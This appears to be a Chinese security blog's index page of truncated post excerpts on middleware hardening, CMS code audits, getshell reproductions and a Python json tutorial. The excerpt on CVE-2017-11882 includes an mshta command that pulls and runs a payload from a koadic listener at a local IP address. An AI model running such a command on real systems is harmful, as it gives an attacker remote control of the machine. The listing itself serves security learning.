昨天突然看到cisp-pte的考核内容，其中的中间件安全考查仿佛就是最近在写的中间件安全配置系列，，无论如何，新手当学习，老师傅就当复习~ 同样开篇会抛出几个tomcat的安全配置问题 问题1.Tomca...

前言：由于漏洞重复了，因此提前公布漏洞详情，挖的几个漏洞都是高危漏洞，后台没有看，同时存在一个后台登录的cookie绕过，这里可看前面文章：代码审计之Semcms v2.3。 一、cms简介 SemCms是一...

项目地址：https://github.com/iBearcat/CVE-2017-11882 首先开启koadic，然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 ...

作者：shiyan 前言： 很早就想搞代码审计了，但是一直觉得自己其他方面还差很多，所以一直在各种补，虽说学的还没忘的快。这次选择ZZCMS8.1主要是当初，这个CMS自从离心小姐姐审计了一番后，然...

作者：Adog 原文链接：https://xianzhi.aliyun.com/forum/topic/1717/ 全国研究生信息安全与对抗技术竞赛（ISCC：Information Security and Countermeasures Contest，www.isclab.org.cn）是为...

在日常的代码审计中，最常见的就是一般的漏洞语句和一些正则表达式，因此在水平达到了一定境界后，我们需要对正则表达式进行一个理解，尝试突破正则这层防线，在百度后发现很少会有实战方面的正...

代码审计顾名思义就是检查源代码中的缺点和错误信息，分析并找到这些问题引发的安全漏洞，并提供代码修订措施和建议。 PHP代码审计 审计套路 通读全文法          (麻烦，但是最全面) 敏...

前言：前段时间挖的cms，发现存在诸多逻辑漏洞，，就发出来让新手学习一波吧，，重在审计手法~ IdeaCMS微商城v2.0是我们在1.0用户需求及反馈的基础上通过近八个月全新研发的集PC+手机+微信于一...

学python一直没有用到json库文件，闲下来了，，就研究下怎么解析json数据 一、json.dumps 这个函数主要是用于将数组、列表等格式的数据解析为json格式 #-*-coding:utf-8...

原文链接：传送门 虽然是复现文章，不过会更详细地来阐释这个漏洞，，因为现在后台getshell花样层出不穷，因此想要复现一波来学习一波getshell姿势~ 因为是最新的dedecms版本，因此我们直接在织...